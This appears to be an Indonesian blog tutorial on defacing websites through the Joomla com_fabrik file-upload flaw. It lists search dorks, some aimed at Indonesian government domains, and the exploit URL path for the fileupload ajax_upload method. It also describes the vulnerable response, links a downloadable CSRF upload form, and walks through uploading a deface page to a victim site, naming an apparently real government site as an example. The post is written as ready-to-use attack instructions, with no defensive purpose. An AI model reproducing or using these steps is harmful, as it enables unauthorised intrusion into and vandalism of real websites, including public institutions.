Cara deface metode com fabrik
Assalamualaikum wr.wb
Oke gan disini gua akan praktikan Cara Deface Com Fabrik, ok simak baik baik!
Dork:
inurl:/com_fabrik site:go.id
inurl:index.php?option=com_fabrik site:
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com
Stelah dapat target, masukin exploitnya
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Vuln? Ada tulisan
{"filepath":null,"uri":null}
Klo dah ktmu gitu kta pke csrfnya,
bagi yang belum punya CSRFnya, kalian bisa memakai punya saya. download csrfnya dulu disini https://drive.google.com/file/d/1lbN2uKJjEtpg4nN5unf7IkP1sSeFOxnK/view?usp=drivesdk
jika sudah di download, ubah perintah htmlnya di apk dcoder atau diapk coding yang kalian pakai saat ini, seperti ini.
Tempel web target dibelakang teks action="WEB TARGET
Trus kita save dngan 2lul.html, dan buka file 2lul.html tersebut, Gambarnya akan seperti ini
Trus klo udah gitu tinggal kita upload file script defacenya, jika sudah di upload Tampilannya akan seperti gambar di bawah ini, Dan cara melihat hasil script defacenya seperti ini, misalkan disitu tertulis {"filepath":"\/html_pemformatan_text.html","uri":"http:\/\/pn-jeneponto.go.id\/namascriptkalian.html"} nah kalian tinggal salin aja dari bagian https:// sampai nama script kalian.html, dan jangan lupa tanda garis miring sepeeti ini ( \ ) hapus!. Oh ya satu lagi Format nama Script Deface kalian bebas, contoh: LulNazi.html / namakalian.html
Nah jika kita lihat hasilnya akan terlihat sperti script yang kalian upload tadi.
Nahh sudah ditebas:v
Okee sampai disini tutorial dari saya, jika ada yang ingin ditanyakan, Hubungi saya di wa:085930261707
dan jangan lupa kunjungi chanel Youtube saya di
Gon Chanel






Tes tes tes
BalasHapus